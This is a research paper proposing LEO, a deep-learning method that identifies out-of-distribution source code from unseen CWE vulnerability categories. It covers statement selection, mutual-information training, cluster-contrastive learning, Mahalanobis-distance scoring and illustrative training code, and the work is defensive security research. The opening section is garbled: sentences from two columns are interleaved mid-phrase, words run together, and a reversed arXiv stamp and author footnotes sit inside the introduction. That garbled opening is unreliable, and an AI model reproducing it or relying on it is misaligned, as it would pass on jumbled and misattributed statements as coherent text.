around 15.27%, 7.39%, and 4.93% on the FPR, AUROC, and The problems of out-of-distribution (a.k.a anomaly) result AUPR measures, respectively, in comparison with the baselines. in rapid progress in the use of advanced machine learning I. INTRODUCTION and deep learning for OOD detection before feeding input data samples to the downstream AI-based modules. How- Software vulnerabilities (SVs), known as specific flaws or ever, though achieving significantly promising performance oversights in software programs allowing attackers to exploit for OOD detection, almost all existing methods are mainly the code base and potentially undertake dangerous activities basedonorapplicabletoimagesincomputervision[23]–[28] (e.g., exposing sensitive information or taking control of a or genomics sequences in medical diagnosis [29], automated computer system) [1], have become a common, serious, and deeplearning-basedtechniquesfordetectingOODsourcecode crucial issue to safety-critical security. There have been many datahavenotyetbeenwellstudiedandexplored.Furthermore, methods proposed for software vulnerability detection (SVD) we observed that these methods cannot be straightforwardly ranging from open-source to commercial tools, and from applied in the context of out-of-distribution source code iden- manual to automatic methods [2]–[17] based on machine tification due to the differing nature of source code data learninganddeeplearningapproaches(i.e.,AI-basedmodels). comparedwithimagesandgenomicssequences.Motivatedby *Corresponding Author (van.nguyen1@monash.edu). Van Nguyen is a 1CWE stands for Common Weakness Enumeration. It is a community- Postdoctoral Research Fellow at the Department of Software Systems and developed list of common security weaknesses that software developers, CybersecurityatMonashUniversity,Australia.Additionally,heisanAffiliate testers, and security professionals can use to identify and mitigate vulner- atCSIRO’sData61,Australia. abilitiesinsoftwaresystems[22]. 4202 rpA 51 ]RC.sc[ 2v46950.4042:viXrathis problem, in this paper, we study the research questions: identificationproblem.Viathispaper,wedemonstratethatthe Given an in-distribution (ID) source code dataset D ability to capture the characteristics of source code data as in well as figure out and leverage the relationships of hidden (associated with one or multiple CWE categories hav-
vulnerability patterns inside and between source code data ing both vulnerable and non-vulnerable source code samples for boosting the data representation learning plays data samples), how to develop an effective method that a key role in OOD source code data identification. can successfully identify whether an input source code data sample is from D in or from an out-of-distribution In particular, our approach consists of two phases. In the (OOD) CWE category? What are the main challenges training phase, we propose an elegant training principle and characteristics of source code data that need to be based on information theory and cluster-contrastive learning considered? (in the scope of our paper, we name this for effectively learning and leveraging the characteristics of problem as OOD source code data identification) source code data to boost the data representation learning process. During the training phase, our proposed approach When considering source code data, we notice that var- enhances the learning of semantic relationships inside and ious instances of vulnerable source code data, associated between source code data samples for forming clear bound- with different CWE categories (e.g., buffer overflow error aries between source code data consisting of different hidden or resource management error), frequently stem from distinct vulnerability patterns (i.e., note that in the latent space, the hidden vulnerability patterns [22]. Furthermore, in each vul- representations of vulnerable source code data sharing the nerablesourcecodesample(i.e.,afunctionoraprogram),the samehiddenvulnerabilitypatterntendtoformacorresponding hiddenvulnerabilitypatternemergesfromtheintricateseman- cluster) in the latent space for the training set of the in- tic relationships between vulnerability-relevant source code distribution data (D ). In the testing (inference) phase, statements. Therefore, to figure out the difference between in inspired by [26], [27], [30], we use the cluster-conditioned source code data from various CWE categories that support detection method (using the Mahalanobis distance [31]) to identifyingOODCWEsourcecodedata,especiallythosethat calculate the outlier score s(X) for each testing input data are vulnerable, the corresponding method needs to have the sample X in the latent space with respect to the training ability to learn and recognize the important and vulnerability- data set (i.e., D ). Based on the outlier score s(X), we relevant source code statements in each source code sample, in determine whether X is from out-of-distribution. Please refer particularly within the vulnerable data. to Section IV for a comprehensive explanation, visualization, Inaddition,weobservedsomecharacteristicsofsourcecode and algorithm of our method. data as follows: (i) source code data are complicated and different from texts or images due to consisting of complex In summary, our key contributions are as follows: semantic and syntactic relationships between code statements • We study an important problem of identifying OOD and code tokens, (ii) different source code data can share a sourcecodedata,whichplaysacrucialroleinstrengthen- significant amount of common background information (e.g., ing the defense of software security systems. Automated non-vulnerable code statements) while there are only a few machine learning and deep learning-based techniques for specificsourcecodestatementscausingthedatatobedifferent thisproblemhavenotyetbeenwellstudiedandexplored. and vulnerable. 
This problem requires an appropriate solution to learn and figure out the vulnerable parts inside vulnerable data in order to distinguish non-vulnerable from vulnerable source code data samples, and (iii) although having the same vulnerability label (e.g., the same vulnerability type, such as a buffer overflow error, or simply being vulnerable in general), there are still many different hidden vulnerability patterns causing source code data samples to be classified as vulnerable. Therefore, an elegant mechanism for automatically figuring out and separating vulnerable source code samples consisting of different hidden vulnerability patterns is essential for ensuring robust representation learning for OOD source code data identification.

To this end, in this paper, we propose a novel deep learning-based approach that can learn and leverage the characteristics of source code data to automatically figure out the important and vulnerability-relevant source code statements, forming the corresponding hidden vulnerability patterns of vulnerable source code data. In addition, our approach can also utilize the semantic relationships of vulnerability patterns inside and between source code data samples to boost the data representation learning that facilitates solving the OOD source code data identification problem. In summary, our main contributions are as follows:

• We propose an innovative information-theoretic learning-based approach to identify out-of-distribution source code data samples (i.e., functions or programs). Our approach can automatically learn the characteristics of source code data as well as figure out and leverage the semantic relationships of hidden vulnerability patterns inside and between source code data samples to boost the data representation learning, enabling the identification of OOD source code data. To the best of our knowledge, our work is one of the first methods proposed to solve the problem. It can serve as an effective baseline for solving the OOD source code data identification problem.

• We comprehensively evaluate and compare our proposed approach with state-of-the-art baselines on real-world source code data covering many CWE categories. Our extensive experiments show that our approach obtains a significantly higher performance than the baselines in three main measures, including FPR (at TPR 95%), AUROC, and AUPR, widely utilized in out-of-distribution identification methods, as noted in [24], [27], [29].

II. MOTIVATIONS

A. The impact of out-of-distribution (OOD) source code data

Out-of-distribution (a.k.a. zero-day) source code data, especially vulnerable ones, are considered highly serious in the realm of cyber-security due to their potential for exploitation before the affected software (system) has a chance to defend against them. Attackers can exploit OOD vulnerabilities (associated with emerging CWE categories) to compromise systems before the developers or the security community becomes aware. This gives hackers a head start in deploying attacks.

The effects of out-of-distribution vulnerability attacks can be far-reaching, as they can compromise sensitive data, disrupt critical infrastructure, and cause financial losses. For instance, the WannaCry ransomware attack in 2017 exploited a vulnerability in Microsoft Windows and affected more than 200,000 computers in 150 countries. Also in 2017, a zero-day vulnerability in the Equifax credit reporting agency's software was exploited, resulting in the theft of sensitive personal and financial information belonging to over 140 million customers. Consequently, Equifax suffered substantial financial and reputational harm, paying over $1 billion in compensation, facing lawsuits, and dealing with regulatory penalties.

B. The need for OOD source code data identification

The incidents resulting from out-of-distribution (OOD) vulnerability attacks have grown increasingly severe, particularly in the era of generative machine learning. With the assistance of domain experts and AI-based tools, e.g., generative large language models, hackers can create and exploit unknown vulnerabilities to compromise software security systems until appropriate measures are taken to address the issue.

AI-based software vulnerability detection (SVD) methods have been proposed and deployed in software security systems to enhance their defense by detecting the vulnerability of the data (e.g., vulnerable or non-vulnerable). Although achieving promising performances for SVD, AI-based methods can only work well on input data from the same distribution as the data used to train the models. When the data have different representations or lie far away from the training data distribution, AI-based methods often achieve poor performances or fail to detect the data vulnerability [15], [20], [32].

Out-of-distribution vulnerabilities associated with emerging CWE source code categories arise annually [22], prompting the need for solutions that enhance the defense of software security systems. To address this issue, the identification of OOD source code data appears as a promising approach. The OOD source code data identification task helps determine if an input is from a learned in-distribution (ID) or out-of-distribution (OOD). That enables the system and security experts to take appropriate precautions and actions. In particular, this stage assists in identifying potential OOD CWE source code data outside the established in-distribution CWE source code data categories to harden the software security systems before the input data is fed into subsequent AI-based modules.

III. RELATED WORK

A. Out-of-distribution (OOD) data identification

There have been many AI-based methods (i.e., machine learning-based and deep learning-based approaches) introduced for out-of-distribution detection, widely applied to computer vision and medical diagnosis applications [24]–[27], [29], [30], [33]–[44]. Although existing methods have achieved promising results for out-of-distribution detection, they are mainly based on or only applicable to computer vision applications or medical diagnosis. Automated deep learning-based techniques for out-of-distribution source code data identification have not yet been well studied. In our paper, we apply some state-of-the-art out-of-distribution detection methods (e.g., [24], [27], [45]) to the problem of identifying OOD source code data. We then proceed to evaluate and compare the performance of these models against our method (please refer to the Experiment section (Section V) for details).

B. Software vulnerability detection (SVD)

AI-based approaches have been widely proposed for SVD, ranging from utilizing handcrafted features manually selected by domain experts [3]–[7] to leveraging automatic feature learning through deep learning-based methods [8]–[10], [12], [15], [46]–[54], showcasing notable advancements in the field. Although achieving significant performances in SVD, AI-based methods often achieve poor performances or struggle when encountering input data situated distantly from the training data distributions [15], [20], [32]. In our paper, we also investigate whether effective methods in SVD can be applied to identifying out-of-distribution source code data. The rationale is that an effective model should produce high-quality data representations that facilitate distinguishing the data between in-distribution (ID) and out-of-distribution (OOD).

We employ effective and state-of-the-art SVD methods including [8], [15], [55]. VulDeePecker [8] is considered one of the most effective deep learning-based SVD methods, leveraging the power of bi-directional long short-term memory (LSTM) networks. CodeBERT [55] is a pre-trained model (based on the Transformer's encoder framework [56]) that specializes in programming languages. Via CodeBERT, we aim to investigate how large language models work in the context of out-of-distribution source code data identification. ReGVD [15] is a simple yet effective graph neural network-based model for the SVD problem.

C. The difference between the source code vulnerability detection and OOD source code identification tasks

The task of identifying OOD source code data differs from that of source code vulnerability detection. In the OOD identification task, the objective is solely to determine whether input data is from established in-distribution categories or from an out-of-distribution category, while in vulnerability detection, we aim to detect the vulnerability (e.g., vulnerable or non-vulnerable) of the data. The OOD identification stage assists the security systems and experts in identifying OOD source code data outside the established in-distribution data so that appropriate precautions and actions can be conducted before feeding input data into subsequent AI-based modules, including the vulnerability detection phase.
Fig. 1: A visualization of our proposed LEO method for effectively improving the source code data representation learning process to solve the out-of-distribution (OOD) source code data identification problem. Given the in-distribution data D_in = {(X_1, y_1), ..., (X_{N_{D_in}}, y_{N_{D_in}})} with (X_in, y_in) ∼ p_in(X, y), the selection network ζ parameterized by g(.,α) selects the important features (i.e., code statements) X̃_in = z ⊙ X_in of each sample, which are fed to the classifier f(.,β) and trained with the innovative cluster-contrastive learning in the latent space.

IV. THE PROPOSED LEO APPROACH

A. The problem statement

We denote D_in as a real-world source code dataset (associated with one or multiple CWE categories) consisting of {(X_1, Y_1), ..., (X_{N_{D_in}}, Y_{N_{D_in}})}, where X_i is a source code data sample (i.e., a function or a program) comprised of L code statements from x_1 to x_L, while X_i's vulnerability label Y_i ∈ {0, 1} (i.e., 0: non-vulnerable and 1: vulnerable). From the dataset D_in, we can build AI-based (machine learning or deep learning) approaches to detect the vulnerability (i.e., benign or vulnerable) of the source code data sampled from the distribution D_in; however, they are known to fail, with high confidence, against data samples (outliers or out-of-distribution data) that lie far away from the data distribution D_in.

In software security systems, the OOD source code data identification process enables the model and security experts to take appropriate precautions and actions before feeding source code input data into subsequent AI-based modules. In our study, given an in-distribution source code dataset D_in, we aim to develop a deep learning-based approach that can effectively identify whether an input source code data sample is from the learned in-distribution D_in or from an out-of-distribution D_out CWE category.

B. Methodology

In what follows, we present the details of how our LEO method works and addresses the out-of-distribution source code data identification problem. We first describe the process of our LEO method, taking into account the source code characteristics and working to automatically learn and figure out the important and vulnerability-relevant source code statements, forming the corresponding hidden vulnerability patterns in vulnerable source code data and contributing to robust source code data representation learning that facilitates out-of-distribution source code data identification. We then present our effective solution for leveraging the semantic relationships of hidden vulnerability patterns inside and between the source code samples (i.e., functions or programs) by utilizing innovative cluster-contrastive learning to further improve the source code data representation learning process.

1) The selection of important features (i.e., source code statements): As depicted in Figure 1, our LEO method starts with a selection network ζ for automatically learning and figuring out the crucial and label-relevant code statements in each source code data sample (a function or a program). It is important to highlight that, for vulnerable source code data, the identified code statements constitute the corresponding vulnerability patterns rendering the data vulnerable. Through the selection network with the use of innovative cluster-contrastive learning (refer to Section IV-B2 for details), in the latent space, the source code data containing different hidden vulnerability patterns will be trained to have different representations, causing them to be situated far apart from each other, while the source code data sharing similar hidden vulnerability patterns are encouraged to remain closely clustered. This process elegantly facilitates out-of-distribution source code data identification.

a) Motivations for important code statement selection to boost the data representation learning process: In every source code data sample, a few certain code statements typically hold greater significance than others in contributing to the corresponding vulnerability, especially in vulnerable source code data. These important and vulnerability-relevant statements often constitute the underlying hidden vulnerability patterns within the vulnerable source code data, as illustrated in the examples in Figure 3. In contrast, the vulnerability-irrelevant code statements can be shared among different non-vulnerable and vulnerable data, potentially compromising the model's capability to learn the representations of vulnerable data. Hence, the automatic learning and identification of critical code statements within each source code data sample play a pivotal role in advancing the data representation learning process. This facilitates the distinction not only between non-vulnerable and vulnerable data but also between data exhibiting different hidden vulnerability patterns.

b) Selection network for choosing important and label-relevant code statements in each source code data sample: Given a source code data sample X consisting of L code statements from x_1 to x_L, to select the important and vulnerability-label-relevant code statements (denoted by X̃) of X, we design a selection model ζ parameterized by a neural network g(.,α). The network g takes X = {x_i}_{i=1}^{L} as the input and outputs the corresponding p = {p_i}_{i=1}^{L}, where each p_i represents the probability that x_i is related to the vulnerability Y of X. In practice, each code statement x_i is represented as a vector using a learnable embedding method described in the data processing and embedding section.

We then construct X̃ = ζ(X) (i.e., the subset of code statements that lead to the vulnerability Y of the function X) by X̃ = X ⊙ z with z ∼ MultiBernoulli(p) = ∏_{i=1}^{L} Bernoulli(p_i) and the element-wise product ⊙, as depicted in Figure 2.
Note that we can view the selection model ζ as a distribution q_sel(z|X;α) over a selector variable z that indicates the important features (i.e., source code statements) of a given sample X: each z_i in z = {z_i}_{i=1}^{L} indicates whether x_i is significant in leading to the vulnerability Y of X (specifically, if z_i is equal to 1, the statement x_i plays an important role in causing the vulnerability Y). To make the selection process (which consists of sampling operations from a Multi-Bernoulli distribution) continuous and differentiable during training, we apply the Gumbel-Softmax trick [57], [58] to relax each Bernoulli variable z_i.

c) Information theory-based learning to guide the selection process: It is important to highlight that the source code data X (as well as its X̃) and its vulnerability label Y possess mutual information (i.e., the information conveyed by Y provides insights into the value of X (as well as X̃) and vice versa). Therefore, to guide the selection network in obtaining the important and label-relevant code statements X̃ (i.e., such that X̃ can predict the vulnerability Y of X correctly), inspired by [14], [59], we apply the information theory principle [60], [61]. In particular, we maximize the mutual information between X̃ and Y, so that the selection process ζ will be learned and enforced to obtain the most meaningful X̃:

    max_ζ I(X̃, Y).    (1)

Following [61], we expand Eq. (1) further as the Kullback-Leibler divergence (which measures the difference in the information of two distributions) of the product of the marginal distributions of X̃ and Y from their joint distribution:

    I(X̃, Y) = ∫ p(X̃, Y) log [ p(X̃, Y) / (p(X̃) p(Y)) ] dX̃ dY.    (2)

In practice, estimating mutual information is challenging, as we typically only have access to samples but not the underlying distributions. Therefore, to estimate the mutual information in Eq. (2), we employ a variational distribution q(Y|X̃) to approximate the posterior p(Y|X̃), hence deriving a variational lower bound of I(X̃, Y), for which the equality holds if q(Y|X̃) = p(Y|X̃), as follows:

    I(X̃, Y) ≥ ∫ p(Y, X̃, X) log [ q(Y|X̃) / p(Y) ] dY dX̃ dX = E_{X,Y} E_{X̃|X} [ log q(Y|X̃) ] + const.    (3)

We model the variational distribution q(Y|X̃) presented in Eq. (3) by using a classifier implemented with a neural network f(X̃;β), which takes X̃ as input and outputs its corresponding label Y (i.e., we view the classifier model as a distribution q_class(Y|X̃;β)). The aim is then to learn both the selection model and the classifier by maximizing the following objective function:

    max_{α,β} { E_{X,Y} E_{z∼q_sel(z|X;α)} [ log q_class(Y|X⊙z;β) ] }.    (4)

Fig. 2: A visualization of the joint training process of the classifier and the selection model, guided by maximizing the mutual information between X̃ and Y. The selection network ζ parameterized by g(.;α) maps the statements x_1, ..., x_L of X to a selector z (e.g., z = [0, 1, 1, ..., 0]), and the masked sample X̃ = X ⊙ z is fed to the classifier f(.;β), trained with max_{α,β} E_{X,Y} E_{z∼q_sel(z|X;α)} [log q_class(Y|X⊙z;β)].

d) Ensuring the selection of meaningful code statements: The joint training process between the classifier f(.,β) and the selection network g(.,α) brings benefits for selecting the important and label-relevant features from the corresponding data. However, this process can also cause a potential limitation. In particular, the predictions of the classifier f(.,β) may rely more on the features selected by the selection network g(.,α) than on the underlying information contained within those features. Consequently, the selected information (i.e., statements) may represent arbitrary subsets of the entire set of statements, rather than meaningful ones from the data.

To this end, we present an underlying-data-distribution mechanism to ensure that the learnable selection process ζ respects the data distribution in selecting the significant and label-relevant information of the data. In particular, in addition to learning the classifier jointly with the selection network as mentioned in Eq. (4), inspired by [62], we propose to learn the classifier model f(.,β) disjointly to approximate the ground truth conditional distribution of Y given subsets of X, denoted by X_R, where X_R = X ⊙ r with r ∼ MultiBernoulli(0.5) (denoted by r ∼ B(0.5) for short). This procedure aids in adjusting the classifier, enabling it to be influenced not only by the information obtained from the selection network ζ but also by the underlying information from the data when updating its parameter β. This process is formalized as learning q_class(.;β) to maximize:

    E_{X,Y} E_{r∼B(0.5)} [ log q_class(Y|X⊙r;β) ].    (5)

To make this process, which involves sampling operations from a Multi-Bernoulli distribution, remain continuous and differentiable during training, we employ the Gumbel-Softmax trick [57], [58]. This technique relaxes each Bernoulli variable r_i ∈ r using the RelaxedBernoulli distribution function [63].
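To make the objectives in Eqs. (4) and (5) concrete, the sketch below illustrates how a per-statement selection network with a binary-concrete (Gumbel-Softmax) relaxation and the two classifier objectives could be implemented. This is a minimal illustration rather than our released implementation: the layer sizes, the temperature of 0.5, and the helper names (relaxed_bernoulli, SelectionNetwork, joint_loss, disjoint_loss) are assumptions for exposition.

import tensorflow as tf

def relaxed_bernoulli(probs, temperature=0.5, eps=1e-8):
    # Binary-concrete (Gumbel-Softmax) relaxation of Bernoulli(probs):
    # z = sigmoid((log p - log(1-p) + log u - log(1-u)) / temperature),
    # which is differentiable w.r.t. probs, unlike a hard Bernoulli sample.
    u = tf.random.uniform(tf.shape(probs), minval=eps, maxval=1.0 - eps)
    logits = tf.math.log(probs + eps) - tf.math.log(1.0 - probs + eps)
    noise = tf.math.log(u) - tf.math.log(1.0 - u)
    return tf.sigmoid((logits + noise) / temperature)

class SelectionNetwork(tf.keras.Model):
    # g(.; alpha): maps each encoded statement to a selection probability p_i.
    def __init__(self, hidden=100):
        super().__init__()
        self.body = tf.keras.layers.Dense(hidden, activation="relu")
        self.head = tf.keras.layers.Dense(1, activation="sigmoid")

    def call(self, x):                    # x: (batch, L, d) encoded statements
        return self.head(self.body(x))    # p: (batch, L, 1)

bce = tf.keras.losses.BinaryCrossentropy()  # classifier outputs P(Y=1 | .)

def joint_loss(classifier, selector, x, y):
    # Eq. (4): classify X ⊙ z with z ~ q_sel(z|X; alpha); minimizing this
    # cross-entropy maximizes E[log q_class(Y | X ⊙ z; beta)].
    # y: (batch, 1) vulnerability labels.
    z = relaxed_bernoulli(selector(x))
    return bce(y, classifier(x * z))

def disjoint_loss(classifier, x, y):
    # Eq. (5): classify X ⊙ r with random masks r ~ MultiBernoulli(0.5),
    # anchoring the classifier to the underlying data distribution. A hard
    # mask is used here for brevity; the paper relaxes r as well [63].
    r = tf.cast(tf.random.uniform(tf.shape(x)[:2]) < 0.5, x.dtype)[..., None]
    return bce(y, classifier(x * r))

In a training step, disjoint_loss would first update β alone, and joint_loss (plus the cluster-contrastive term of Eq. (6) below) would then update α and β together, mirroring lines 5 and 6 of Algorithm 1.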
2) Innovative cluster-contrastive learning for improving source code data representation learning:

a) Motivation: Using contrastive learning [64] to improve data representations has been widely applied to computer vision domain applications, from vision classification, detection, and segmentation [65]–[69] to vision data out-of-distribution detection [27]. Its main idea is to encourage data having the same label to share close representations. In our study, we also aim to explore the potential of contrastive learning to enhance the representation learning process for source code data. However, based on our observations, straightforwardly applying contrastive learning to source code data is excessive and not appropriate, because even under the same vulnerability label, source code data can often consist of different hidden vulnerability patterns causing them to be vulnerable (in our experiments in Section V, we demonstrate this observation by comparing our LEO method with one of the most effective OOD approaches using contrastive learning, namely SSD [27]).

As illustrated in Figure 3, despite sharing the same vulnerability label Y (e.g., the same CWE category, such as a buffer overflow error), there are still several different hidden vulnerability patterns causing the source code data samples to be vulnerable. Consequently, although in the same vulnerability label Y, the representations of vulnerable source code samples formed from different hidden vulnerability patterns need to be different. Conversely, when they are from the same vulnerability patterns, their representations should be close or similar. To ensure these properties and leverage the power of contrastive learning to further improve the data representation learning process, we propose using innovative cluster-contrastive learning.

Fig. 3: Two examples of vulnerability patterns causing a buffer overflow error [22]. The left-hand function shows an example of a buffer copy without checking the size of the input. The right-hand function exhibits an example of improper validation of an array index: it only verifies the array index against the maximum length, not the minimum value.

b) Innovative cluster-contrastive learning: It is important to highlight that vulnerable source code data samples originating from the same vulnerability patterns tend to have similar X̃ and form a corresponding cluster in the latent space. Therefore, we first use clustering analysis (e.g., k-means) on the representations X̃ of the vulnerable source code samples in the latent space to group vulnerable samples with the same vulnerability patterns into clusters, before employing contrastive learning to force vulnerable data to become more similar within the same clusters and to be pushed far apart across different clusters, as follows:

    L_ccl = Σ_{i∈I} 1[Y_i = 1] (−1/|C(i)|) Σ_{c∈C(i)} log [ exp(sim(X̃_i, X̃_c)/τ) / Σ_{a∈A(i)} exp(sim(X̃_i, X̃_a)/τ) ],    (6)

where I ≡ {1, ..., m} is the set of indices of the input data in a specific mini-batch, A(i) ≡ I \ {i}, and C(i) ≡ {c ∈ A(i) : Ȳ_c = Ȳ_i and Y_c = 1} is the set of indices of the vulnerable source code samples (labeled 1) that are in the same cluster as X̃_i, except i itself, while |C(i)| is its cardinality. Here, we apply k-means to each mini-batch and denote Ȳ_i as the cluster label of the data sample X̃_i. For the sim(.,.) function, we apply cosine similarity. Note that to form the corresponding vector for each X̃_i in the latent space for calculating the cosine similarity, we simply concatenate all vectors, where each vector stands for the representation of a code statement in X̃_i.

It is worth noting that the cluster-contrastive learning described in Eq. (6) helps enforce important properties of the source code data, including that (i) the vulnerable and non-vulnerable source code samples should have different representations, (ii) the vulnerable source code samples from different hidden vulnerability patterns are also encouraged to have different representations, while (iii) the vulnerable source code samples with similar hidden vulnerability patterns are trained to have close representations. Ensuring these properties helps improve the selection process, which in turn boosts the source code data representation learning, facilitating out-of-distribution source code data identification.

3) A summary of our LEO method: Algorithm 1 exhibits the details of our proposed LEO method in the training and testing phases.

a) The training phase: In brief, during the training process, we update the parameters α and β of the selection model ζ parameterized by g(.,α) and the classifier model f(.,β) simultaneously through the objective functions presented in Eqs. (4), (5), and (6). After the training phase, our objective is to leverage the optimal trained selection network to create distinct representations in the latent space for source code data stemming from different hidden vulnerability patterns. This ensures they are positioned far apart, while source code data sharing similar hidden vulnerability patterns remain closely clustered. This elegant process effectively facilitates the identification of out-of-distribution source code data.

b) The inference phase: Inspired by [26], [27], [30], we use a cluster-conditioned OOD detection method (i.e., applying the Mahalanobis distance to calculate the outlier score s(X) for each testing sample X) in the latent space for OOD source code data identification. The procedure for the cluster-conditioned detection method is as follows: we first partition the features of the in-distribution training data into K clusters, equal to the number of clusters used in cluster-contrastive learning. We then compute the outlier score s(X) of each testing input X as s(X) = min_k (X̃ − μ_k)^⊤ Σ_k^{−1} (X̃ − μ_k), where μ_k and Σ_k are the sample mean and sample covariance of each cluster k among the K clusters. We finally compare this outlier score with a threshold value to decide if the corresponding input sample is OOD.
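As a concrete reading of Eq. (6), the sketch below shows one way the cluster-contrastive loss could be computed for a mini-batch: k-means assigns the cluster labels Ȳ, vulnerable samples sharing a cluster act as positives C(i), and all other samples in the batch form the normalizing set A(i). It is a simplified, eager-mode illustration under assumed names (cluster_contrastive_loss) and shapes, not our released implementation.

import numpy as np
import tensorflow as tf
from sklearn.cluster import KMeans

def cluster_contrastive_loss(reps, labels, n_clusters=5, tau=0.5):
    # reps:   (m, d) concatenated statement representations X_tilde per sample
    # labels: (m,) vulnerability labels Y (1: vulnerable, 0: non-vulnerable)
    labels = np.asarray(labels)
    # Cluster the mini-batch; the cluster ids play the role of Y_bar in Eq. (6).
    cluster_ids = KMeans(n_clusters=n_clusters, n_init=10).fit_predict(
        reps.numpy())
    normed = tf.math.l2_normalize(reps, axis=1)
    sim = tf.matmul(normed, normed, transpose_b=True) / tau  # cosine / tau
    m = int(reps.shape[0])
    loss, n_anchors = 0.0, 0
    for i in range(m):
        if labels[i] != 1:             # anchors are vulnerable samples only
            continue
        pos = [c for c in range(m) if c != i and labels[c] == 1
               and cluster_ids[c] == cluster_ids[i]]          # C(i)
        if not pos:
            continue
        # log-sum-exp over A(i) = I \ {i}; the mask removes the anchor i.
        mask = tf.constant([0.0 if j == i else 1.0 for j in range(m)])
        log_denom = tf.reduce_logsumexp(sim[i] + tf.math.log(mask + 1e-30))
        loss += -tf.reduce_mean(tf.gather(sim[i], pos) - log_denom)
        n_anchors += 1
    return loss / max(n_anchors, 1)

During training, this term is added to the joint objective with the trade-off weight λ (line 6 of Algorithm 1).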
Algorithm 1: The algorithm of our proposed LEO method for out-of-distribution source code data identification.

Input: An in-distribution source code dataset D_in = {(X_1, Y_1), ..., (X_{N_{D_in}}, Y_{N_{D_in}})} (associated with one or multiple CWE categories), where each source code data sample X_i consists of L code statements from x_1 to x_L while its vulnerability label Y_i ∈ {0, 1} (i.e., 1: vulnerable and 0: non-vulnerable), used during the training phase. An out-of-distribution CWE source code data category D_out is used in the inference (testing) phase, denoted as X_test. We denote the number of training iterations nt, the mini-batch size m, the trade-off hyper-parameter λ, and the number of clusters used in cluster-contrastive learning K. We randomly partition D_in into the training set D_train and the validation set X_val.

1: Initialize the parameters α and β of the selection model ζ parameterized by g(.,α) and the classifier model f(.,β), respectively.
2: Training Phase
3: for t = 1 to nt do
4:   Choose a mini-batch of source code data samples denoted by {(X_i, Y_i)}_{i=1}^{m} from D_train.
5:   Update the classifier parameter β by minimizing the cross-entropy loss E_{X,Y} E_{r∼B(0.5)} [L_ce(Y, f_β(X⊙r))] using the Adam optimizer [70]. Note that minimizing this function is equivalent to maximizing the objective function in Eq. (5).
6:   Update the classifier parameter β and the selection model parameter α by minimizing the objective function E_{X,Y} E_{z∼q_sel(z|X;α)} [L_ce(Y, f_β(X⊙z)) + λ L_ccl] using the Adam optimizer, where L_ccl is described in Eq. (6).
7: end for
8: Note that, after the training phase, we aim to obtain the optimal selection network for source code data representation learning. The trained selection network can select the most meaningful and label-relevant source code statements, forming the hidden vulnerability patterns of vulnerable data, for each source code data sample in the learned in-distribution D_in, to facilitate the model's ability to identify out-of-distribution CWE source code data.
9: Testing Phase
10: Partition D_train into K clusters. In particular, we use k-means to cluster the entire set of training data representations in the latent space into K clusters, equal to the number of clusters used in the innovative cluster-contrastive learning (mentioned in Eq. (6)).
11: For each X_i ∈ X_test (denoted as X_i^test), use the Mahalanobis distance to calculate the outlier (out-of-distribution) score s(X_i^test) = min_k (X̃_i^test − μ_k)^⊤ Σ_k^{−1} (X̃_i^test − μ_k), where μ_k and Σ_k are the sample mean and sample covariance of the k-th cluster, k ∈ {1, ..., K}. In short, s_{X_test} = score(X̃_test, μ_{X_train}, Σ_{X_train}).
12: For each X_i ∈ X_val (denoted as X_i^val), use the Mahalanobis distance to calculate the outlier (out-of-distribution) score s(X_i^val) = min_k (X̃_i^val − μ_k)^⊤ Σ_k^{−1} (X̃_i^val − μ_k), where μ_k and Σ_k are the sample mean and sample covariance of the k-th cluster, k ∈ {1, ..., K}. In short, s_{X_val} = score(X̃_val, μ_{X_train}, Σ_{X_train}).
13: Calculate the threshold s_{X_val} at TPR = 95%. (The threshold value is chosen at TPR = 95%, as commonly used in OOD detection methods.)
14: if s(X_i^test) > s_{X_val} then
15:   X_i^test is an out-of-distribution data sample.
16: else
17:   X_i^test is an in-distribution data sample.
18: end if

Output: For each X_i ∈ X_test (denoted as X_i^test), whether X_i^test is an out-of-distribution data sample.
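The testing phase of Algorithm 1 (lines 10 to 18) reduces to fitting per-cluster Gaussian statistics on the in-distribution training representations and thresholding a minimum Mahalanobis distance. A minimal sketch of this scoring, assuming NumPy/scikit-learn and illustrative helper names (fit_cluster_stats, outlier_score), is given below; the small ridge term that keeps the covariance invertible is a common practical choice rather than a detail specified in Algorithm 1.

import numpy as np
from sklearn.cluster import KMeans

def fit_cluster_stats(train_reps, K=5, ridge=1e-6):
    # Line 10: partition the ID training representations into K clusters and
    # estimate the per-cluster mean and (inverse) covariance.
    km = KMeans(n_clusters=K, n_init=10).fit(train_reps)
    stats = []
    for k in range(K):
        members = train_reps[km.labels_ == k]
        mu = members.mean(axis=0)
        cov = np.cov(members, rowvar=False) + ridge * np.eye(train_reps.shape[1])
        stats.append((mu, np.linalg.inv(cov)))
    return stats

def outlier_score(x, stats):
    # Lines 11-12: s(X) = min_k (x - mu_k)^T Sigma_k^{-1} (x - mu_k).
    return min(float((x - mu) @ inv_cov @ (x - mu)) for mu, inv_cov in stats)

# Line 13: choose the threshold so that 95% of validation (ID) samples are
# accepted as in-distribution (TPR = 95%), then flag higher-scoring inputs:
# threshold = np.percentile([outlier_score(v, stats) for v in val_reps], 95)
# is_ood = outlier_score(x_test, stats) > threshold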
V. EXPERIMENTS

A. Experimental designs

The key goal of our experiments is to evaluate our LEO method and compare it with state-of-the-art baselines for out-of-distribution source code data identification. Below, we present the research questions of our paper.

(RQ1) Can our method successfully identify OOD source code data? How effective is it compared to the baselines?

For AI-based systems, being able to detect data that is out-of-distribution can be critical to maintaining safe and reliable predictions. Although achieving promising performances, current state-of-the-art OOD methods are mostly applied to computer vision and medical diagnosis applications. Automated deep learning-based approaches for OOD identification on source code data have not yet been well studied and explored. To this end, we propose one of the first methods for OOD source code data identification. We demonstrate that by taking into account source code characteristics and leveraging the correlations of the potentially hidden vulnerability patterns inside and between the source code data samples from the learned in-distribution D_in, we can significantly improve the source code data representation learning for boosting OOD source code data identification.

(RQ2) How does our method perform in different cases of the in-distribution data when it consists of more than one CWE source code data category?

In practice, the in-distribution data D_in may encompass source code data from one or multiple CWE categories. Therefore, in this research question, we investigate the performance of our LEO method in various cases regarding different numbers of CWE categories (i.e., without loss of generality, we assume there are two and three different CWE categories) present in the in-distribution source code data D_in and observe how the model performs compared to the baselines.

(RQ3) Do the innovative cluster-contrastive learning and underlying-data-distribution mechanism help improve the source code data representation learning for boosting the model performance in OOD source code data identification?

We investigate the effectiveness of the cluster-contrastive learning (considering source code characteristics and the semantic relationships inside and between code data) and the underlying-data-distribution mechanism (ensuring the selection of significant source code statements) in enhancing the entire source code data representation learning process, helping boost the model's ability for OOD source code data identification.

